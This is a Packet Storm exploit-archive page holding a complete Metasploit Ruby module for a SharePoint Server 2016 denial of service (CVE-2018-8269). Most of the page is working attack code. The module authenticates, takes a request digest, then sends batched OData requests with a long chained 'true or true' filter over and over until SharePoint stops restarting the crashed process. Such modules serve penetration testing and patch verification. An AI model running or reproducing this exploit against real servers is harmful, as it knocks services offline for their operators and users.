exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Office SharePoint Server 2016 Denial Of Service

Microsoft Office SharePoint Server 2016 Denial Of Service
Posted Jan 9, 2019
Authored by Gal Zror | Site metasploit.com

A vulnerability in Microsoft SharePoint Server could allow a remote attacker to make the server unavailable. The vulnerability is a result of the dependency SharePoint has in Microsoft.Data.OData library which was vulnerable to remote DOS.

tags | exploit, remote, denial of service
advisories | CVE-2018-8269
SHA-256 | ce47058025f34b12c16191be810750851781cf4964d5249ddcd7414cb84b5b2d

Microsoft Office SharePoint Server 2016 Denial Of Service

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'sharepoint-ruby'

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
include Msf::Exploit::Remote::HttpClient


def initialize(info = {})
super(update_info(info,
'Name' => 'DOS Vulnerability in SharePoint 2016 Server',
'Description' => %q{
A vulnerability in Microsoft SharePoint Server could allow a remote attacker to make the server unavailable.
The vulnerability is a result of the dependency SharePoint has in Microsoft.Data.OData library which was
vulnerable to remote DOS (See CVE-2018-8269). The exploit is done by sending a crafted request that contains
an OData filter that triggers the vulnerability in Microsoft.Data.OData library. Sending such request, will
terminate the process that runs the server. By default, SharePoint server is configured to recover a
terminated process, but it will do so only 10 times. If more than 10 malicious requests are sent in 5
minutes interval, the server will not recover and will be down until it is manually restarted.
},
'Author' =>
[
'Gil Mirmovitch', # Vulnerability discover and poc
'Gal Zror' # Metasploit module
],
'Platform' => 'win',
'References' =>
[
[ 'CVE', '2018-8269' ],
[ 'ALEPH', '2018002' ]
],
'Targets' =>
[
[ 'Microsoft Office SharePoint Server 2016', { } ],
],

))

register_options(
[
Opt::RPORT(443),
OptString.new('SSL', [true, 'Negotiate SSL/TLS for outgoing connections', true]),
OptString.new('USERNAME', [true, 'The username to login with']),
OptString.new('PASSWORD', [true, 'The password to login with']),
OptString.new('VHOST', [true, 'HTTP server virtual host'])
], self.class)

end

def fetch_auth_cookie
print_status("Fetching Authentication Cookie")
begin
site = Sharepoint::Site.new vhost, 'server-relative-site-url'
site.session.authenticate datastore['USERNAME'], datastore['PASSWORD']
return site.session.cookie
rescue Sharepoint::Session::AuthenticationFailed
fail_with(Failure::NoAccess, "Authentication failed")
end
print_good("Authentication Succeeded")
end

def extract_digest_value(cookie)
token_api_uri = '/_api/contextinfo'
res = send_request_cgi( {
'method' => 'POST',
'uri' => normalize_uri(token_api_uri),
'cookie' => cookie,
})
if res.nil?
fail_with(Failure::UnexpectedReply, "Empty context response")
end
res.get_xml_document.xpath('//d:FormDigestValue').text
end

def send_dos_request
send_request(6100)
end

def send_innocent_request
send_request(5)
end

def send_request(reps)
vuln_api_uri = "/_api/$batch"
cookie = datastore['COOKIE']

data = Rex::MIME::Message.new
data.add_part(
"GET /_api/web/lists?$filter=true" + "+or+true" * reps + " HTTP/1.1\r\n" +
"accept: application/json;odata.metadata=minimal\r\n", #Data is our payload
'application/http', #Content Type
'binary', #Transfer Encoding
nil #Content Disposition
)
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(vuln_api_uri),
'ctype' => "multipart/mixed; boundary=#{data.bound}",
'data' => data.to_s,
'cookie' => cookie,
'headers' => {
'x-requestdigest' => extract_digest_value(cookie),
}

})
end

def dos
print_status("Sending DOS malicious requests...")
(0..10).each {|i|
print_status("Countdown #{10 - i}...")
send_dos_request
sleep(60)
}

end

def check
datastore['COOKIE'] = fetch_auth_cookie

print_status("Sending innocent request...")
res = send_innocent_request

if res && res.code == 200
print_good("Server responded 200 to innocent request")
else
print_bad("Server response " + res.code.to_s + " to innocent request")
return Exploit::CheckCode::Unknown
end

print_status("Sending malicious request...")
res = send_dos_request

if res.nil?
Exploit::CheckCode::Vulnerable
else
print_bad("Server response " + res.code.to_s + " to malicious request")
Exploit::CheckCode::Safe
end
end

def run
if check == Exploit::CheckCode::Vulnerable
dos
end
end
end
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    31 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close